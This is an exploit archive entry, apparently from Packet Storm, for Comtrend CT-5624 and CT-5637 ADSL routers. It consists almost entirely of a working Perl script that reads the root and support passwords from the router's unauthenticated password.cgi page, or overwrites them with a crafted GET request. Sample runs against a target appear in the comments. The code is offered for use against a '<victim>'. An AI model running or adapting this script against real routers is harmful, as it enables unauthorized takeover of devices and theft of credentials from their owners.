Comtrend Router CT-5624 Remote Root Password Changer/Disclosure

2011-11-08T00:00:00
ID PACKETSTORM:106740
Type packetstorm
Reporter Todor Donev
Modified 2011-11-08T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit  
#  
# Author: Todor Donev  
# Email: todor.donev@@gmail  
# Type: Hardware  
# Vuln Type: Remote  
#   
# Tested:  
# Board ID : CT-5624  
# Software : A011-306TSR-C01_R03  
# Bootloader : 1.0.37-0.7-3  
# ADSL : A2pB022c3.d20e  
#  
# Board ID : CT-5637  
# Software : A111-312BTC-C01_R12  
# Bootloader : 1.0.37-12.1-1  
# ADSL : A2pB023k.d20k_rc2  
#  
#####  
# CT-5624 ADSL2+ Ethernet Router  
# The CT-5624 series ADSL2+ compact and high performance Ethernet router   
# provides four 10/100 Ethernet Interfaces, and one ADSL line interface   
# to access the Internet, incorporating LAN or Video on Demand over one   
# ordinary telephone line, at speeds of up to 24 Mbps. It also has full   
# routing capabilities to segment/route IP protocol, and supports advanced   
# security functions.   
#####  
#  
# playground$ perl comtrend.pl -c 192.168.1.1:80  
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit  
# [!] Target: 192.168.1.1:80  
# [o] New root password: root31337  
# [o] New support password: sup31337  
# [*] Successfully !!  
##  
# playground$ perl comtrend.pl -d 192.168.1.1:80  
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit  
# [!] Target: 192.168.1.1:80  
# [o] root: root31337  
# [o] support: sup31337  
##  
# playground$ perl comtrend.pl  
# [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit  
# [!] usg: perl comtrend.pl [-c or -d] <victim>  
# [!] -d: Disclosure Root/Support password  
# [!] -c: Change Root/Support password  
#  
#####  
# Thanks to Tsvetelina Emirska   
# for the help and support which gives me =)  
#####  
  
use LWP::Simple;  
print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";  
if (@ARGV == 0) {&usg;}  
while (@ARGV > 0) {  
$type = shift(@ARGV);  
$t = shift(@ARGV);  
if ($type eq "-d") {  
my $r = get("http://$t/password.cgi") or die("suck!");  
print "[!] Target: $t\n";  
if ($r =~ m/pwdAdmin = '(.*)';/g) {  
$result .= "[o] root: $1\n";  
}   
if ($r =~ m/pwdSupport = '(.*)';/g) {  
$result .= "[o] support: $1\n";  
print $result;   
}}}  
if ($type eq "-c") {  
print "[!] Target: $t\n";  
print "[o] New root password: ";  
my $rootpass=<STDIN>;  
chomp($rootpass);  
print "[o] New support password: ";  
my $suppass=<STDIN>;  
chomp($suppass);  
my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");  
if ($r =~ m/pwdAdmin = '$rootpass';/g) {  
print "[*] Successfully !!\n";  
}}  
sub usg(){  
print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";  
print "[!] -d: Disclosure Root/Support password\n";  
print "[!] -c: Change Root/Support password\n";  
exit;  
}  
`